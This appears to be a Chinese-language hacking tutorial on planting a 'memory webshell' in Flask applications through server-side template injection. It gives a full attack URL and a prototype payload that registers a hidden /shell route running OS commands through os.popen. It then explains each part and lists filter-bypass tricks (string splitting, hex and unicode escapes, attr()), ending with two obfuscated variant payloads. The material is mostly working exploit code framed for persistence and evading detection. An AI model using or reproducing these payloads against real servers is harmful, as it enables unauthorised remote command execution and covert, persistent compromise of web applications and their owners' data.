python内存马
python内存马
VVkladg0rweb权限维持
介绍
webshell内存马是把木马和后门写在内存中 然后去执行 达到webshell
可以加强攻击的隐蔽性和排查难度
python内存马
前置
常用的Python
框架有Django
、Flask
, 这两者都可能存在SSTI
漏洞. Python 内存马利用Flask框架中SSTI注入来实现, Flask
框架中在web
应用模板渲染的过程中用到render_template_string
进行渲染, 但未对用户传输的代码进行过滤导致用户可以通过注入恶意代码来实现Python
内存马的注入.
当网页请求进入Flask
时, 会实例化一个Request Context
. 在Python
中分出了两种上下文: 请求上下文(request context)、应用上下文(session context). 一个请求上下文中封装了请求的信息, 而上下文的结构是运用了一个Stack
的栈结构, 也就是说它拥有一个栈所拥有的全部特性. request context
实例化后会被push
到栈_request_ctx_stack
中, 基于此特性便可以通过获取栈顶元素的方法来获取当前的请求.
环境
攻击
马:
http://127.0.0.1:8000/test?param={{url_for.__globals__[%27__builtins__%27][%27eval%27](%22app.add_url_rule(%27/shell%27,%20%27shell%27,%20lambda%20:__import__(%27os%27).popen(_request_ctx_stack.top.request.args.get(%27cmd%27,%20%27whoami%27)).read())%22,{%27_request_ctx_stack%27:url_for.__globals__[%27_request_ctx_stack%27],%27app%27:url_for.__globals__[%27current_app%27]})}} |
原型:
url_for.__globals__['__builtins__']['eval']( |
把马传上去
这样我们就可以执行命令了
在shell路由下传参cmd 可执行命令 但是在服务器中是没有shell路径的
解析
url_for.__globals__['__builtins__']['eval']( |
对于url_for.__globals__['__builtins__']['eval']
这一截Payload
, url_for
是Flask
的一个内置函数, 通过Flask
内置函数可以调用其__globals__
属性, 该特殊属性能够返回函数所在模块命名空间的所有变量, 其中包含了很多已经引入的modules
, 可以看到这里是支持__builtins__
的.
在__builtins__
模块中, Python
在启动时就直接为我们导入了很多内建函数. 准确的说, Python
在启动时会首先加载内建名称空间, 内建名称空间中有许多名字到对象之间的映射, 这些名字就是内建函数的名称, 对象就是这些内建函数对象. 在__builtins__
模块的内建函数中是存在eval
、exec
等命令执行函数的.
由于存在命令执行函数, 因此我们就可以直接调用命令执行函数来执行危险操作
就是SSTI
接着再来看看app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read())
这一截Payload
. 这部分是动态添加了一条路由, 而处理该路由的函数是个由lambda
关键字定义的匿名函数.
在Flask
中注册路由的时候是添加的@app.route()
装饰器来实现的, 跟进查看其源码实现, 发现其调用了add_url_rule
函数来添加路由.
跟进
add_url_rule
函数, 其参数说明如下:
- rule: 函数对应的
URL
规则, 满足条件和app.route
的第一个参数一样, 必须以/
开头.- endpoint: 端点, 即在使用
url_for
进行反转的时候, 这里传入的第一个参数就是endpoint
对应的值, 这个值也可以不指定, 默认就会使用函数的名字作为endpoint
的值.- view_func:
URL
对应的函数, 这里只需写函数名字而不用加括号.- provide_automatic_options: 控制是否应自动添加选项方法.
- options: 要转发到基础规则对象的选项.
lambda
即匿名函数, Payload
中add_url_rule
函数的第三个参数定义了一个lambda
匿名函数, 其中通过os
库的popen
函数执行从Web
请求中获取的cmd
参数值并返回结果, 其中该参数值默认为whoami
.
再来看看'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']}
这一截Payload
. _request_ctx_stack
是Flask
的一个全局变量, 是一个LocalStack
实例, 这里的_request_ctx_stack
即上文中提到的Flask 请求上下文管理机制
中的_request_ctx_stack
. app
也是Flask
的一个全局变量, 这里即获取当前的app
.
所以
eval
函数的功能即动态创建一条路由, 并在后面指明了所需变量的全局命名空间, 保证app
和_request_ctx_stack
都可以被找到
绕过
在实际应用中往往都存在过滤, 因此了解如何绕过还是必要的.
url_for
可替换为get_flashed_messages
或者request.__init__
或者request.application
.- 代码执行函数替换, 如
exec
等替换eval
. - 字符串可采用拼接方式, 如
['__builtins__']['eval']
变为['__bui'+'ltins__']['ev'+'al']
. __globals__
可用__getattribute__('__globa'+'ls__')
替换.[]
可用.__getitem__()
或.pop()
替换.- 过滤
{{`或者`}}
, 可以使用{%`或者`%}
绕过,{%%}
中间可以执行if
语句, 利用这一点可以进行类似盲注的操作或者外带代码执行结果. - 过滤
_
可以用编码绕过, 如__class__
替换成\x5f\x5fclass\x5f\x5f
, 还可以用dir(0)[0][0]
或者request['args']
或者request['values']
绕过. - 过滤了
.
可以采用attr()
或[]
绕过.
就是ssti的绕过
原型payload:
url_for.__globals__['__builtins__']['eval']("app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('shell')).read())",{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']}) |
变形payload1:
request.application.__self__._get_data_for_json.__getattribute__('__globa'+'ls__').__getitem__('__bui'+'ltins__').__getitem__('ex'+'ec')("app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('shell', 'calc')).read())",{'_request_ct'+'x_stack':get_flashed_messages.__getattribute__('__globa'+'ls__').pop('_request_'+'ctx_stack'),'app':get_flashed_messages.__getattribute__('__globa'+'ls__').pop('curre'+'nt_app')}) |
变形payload2:
get_flashed_messages|attr("\x5f\x5fgetattribute\x5f\x5f")("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetattribute\x5f\x5f")("\x5f\x5fgetitem\x5f\x5f")("__builtins__")|attr("\x5f\x5fgetattribute\x5f\x5f")("\x5f\x5fgetitem\x5f\x5f")("\u0065\u0076\u0061\u006c")("app.add_ur"+"l_rule('/shell', 'shell', la"+"mbda :__imp"+"ort__('o"+"s').po"+"pen(_request_c"+"tx_stack.to"+"p.re"+"quest.args.get('shell')).re"+"ad())",{'\u005f\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u005f\u0063\u0074\u0078\u005f\u0073\u0074\u0061\u0063\u006b':get_flashed_messages|attr("\x5f\x5fgetattribute\x5f\x5f")("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetattribute\x5f\x5f")("\x5f\x5fgetitem\x5f\x5f")("\u005f\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u005f\u0063\u0074\u0078\u005f\u0073\u0074\u0061\u0063\u006b"),'app':get_flashed_messages|attr("\x5f\x5fgetattribute\x5f\x5f")("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetattribute\x5f\x5f")("\x5f\x5fgetitem\x5f\x5f")("\u0063\u0075\u0072\u0072\u0065\u006e\u0074\u005f\u0061\u0070\u0070")}) |